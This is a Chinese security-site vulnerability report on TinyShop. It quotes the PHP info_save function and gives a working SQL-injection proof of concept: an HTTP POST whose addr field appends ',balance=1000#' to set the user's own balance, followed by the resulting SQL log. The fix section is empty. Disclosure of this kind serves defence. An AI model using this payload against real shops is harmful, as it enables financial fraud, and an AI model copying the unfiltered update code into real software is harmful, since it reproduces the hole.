频道栏目
首页 > 安全 > 网站安全 > 正文
Tinyshop刷钱漏洞
2014-11-09 07:48:00         来源:magerx  
收藏   我要投稿

之前看到一个它的刷钱漏洞,不过补了,后来一看还是可以。。,只修复之前的post覆盖data数组


/protected/controllers/ucenter.php,393行

public function info_save()
    {
        $rules = array('name:required:昵称不能为空!','real_name:required:真实姓名不能为空!','sex:int:性别必需选择!','birthday:date:生日日期格式不正确!','mobile:mobi:手机格式不正确','phone:phone:电话格式不正确');
        $info = Validator::check($rules);
        if(is_array($info)){
            $this->redirect("info",false,array('msg'=>array("info",$info['msg'])));
        }else{
            $data = array(
                    'name'=>Filter::str(Req::args('name')),
                    'real_name'=>Filter::str(Req::args('real_name')),
                    'sex'=>Filter::int(Req::args('sex')),
                    'birthday'=>Req::args('birthday'),
                    'mobile'=>Req::args('mobile'),
                    'phone'=>Req::args('phone'),
                    'province'=>Req::args('province'),
                    'city'=>Req::args('city'),
                    'county'=>Req::args('county'),
                    'addr'=>Filter::text(Req::args('addr'))
                );
        }
        $name = Filter::sql(Req::args("name"));
        $id = $this->user['id'];
        $this->model->table("user")->data(array("name"=>$name))->where("id=$id")->update();

        $this->model->table("customer")->data($data)->where("user_id=$id")->update();
        $obj = $this->model->table("user as us")->join("left join customer as cu on us.id = cu.user_id")->fields("us.*,cu.group_id,cu.login_time")->where("us.id=$id")->find();
                    $this->safebox->set('user',$obj,$this->cookie_time);
        $this->redirect("info");
    }

从上面来看以下地方的过滤都是有问题的

'birthday'=>Req::args('birthday'),
                    'mobile'=>Req::args('mobile'),
                    'phone'=>Req::args('phone'),
                    'province'=>Req::args('province'),
                    'city'=>Req::args('city'),
                    'county'=>Req::args('county'),
                    'addr'=>Filter::text(Req::args('addr'))


导致可以注入,但是我们并不关心这个,因为用户账户余额的字段banlance也是在这个表中,所以我们可以通过update操作给自己刷钱,而不是用这个注入来盲注。
 

漏洞证明:

poc:

POST /tinyshop/index.php?con=ucenter&act=info_save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://localhost/tinyshop/index.php?con=ucenter&act=info
Cookie: CNZZDATA80862620=cnzz_eid%3D163438544-1407551214-http%253A%252F%252Flocalhost%252F%26ntime%3D1408007142; bdshare_firstime=1407551237892; tm_ibc=0; ZDEDebuggerPresent=php,phtml,php3; CNZZDATA1670348=cnzz_eid%3D2114245156-1409299086-http%253A%252F%252Flocalhost%252F%26ntime%3D1409299086; ver=free; PHPSESSID=f2943c79c9d287ef2a0136f0525e9fb3; language=5ad2ae3c20c17a82d4b61aaa71f61e05f5b4a0a2s%3A5%3A%22zh_cn%22%3B; 1_product=f5de13e802a02fac20482edfe9ee2d303641bc6ds%3A1%3A%221%22%3B; pageSize=7fe99f844d5233ed16ab2d46f0b885fe7b213e04s%3A2%3A%2220%22%3B; safecode=1; Tiny_autologin=ed6460c9a8OTU2Nzg2NTAwMmFiNDQ9NTsyMzBjOGJlNjAyZjJlY2c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161

name=test1%40qq.com&real_name=1&sex=0&birthday=2014-09-30&mobile=13900000001&phone=13222222222&province=420000&city=421300&county=421301&addr=111111',balance=1000#



SQL查询日志:

187323 Query update tiny_customer set `real_name` = '1',`sex` = 0,`birthday` = '2014-09-30',`mobile` = '13900000001',`phone` = '13222222222',`province` = 420000,`city` = 421300,`county` = 421301,`addr` = '111111',balance=1000#' where user_id=4

 


看看结果:
 

tinyshop_1.jpg

 

修复方案:

点击复制链接 与好友分享!回本站首页
相关TAG标签 刷钱 漏洞
上一篇:74CMS 最新版二次SQL注入可越权操作两处(问题总结)
下一篇:全国通用期刊稿件系统 Journalx 2.0 存储型xss
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站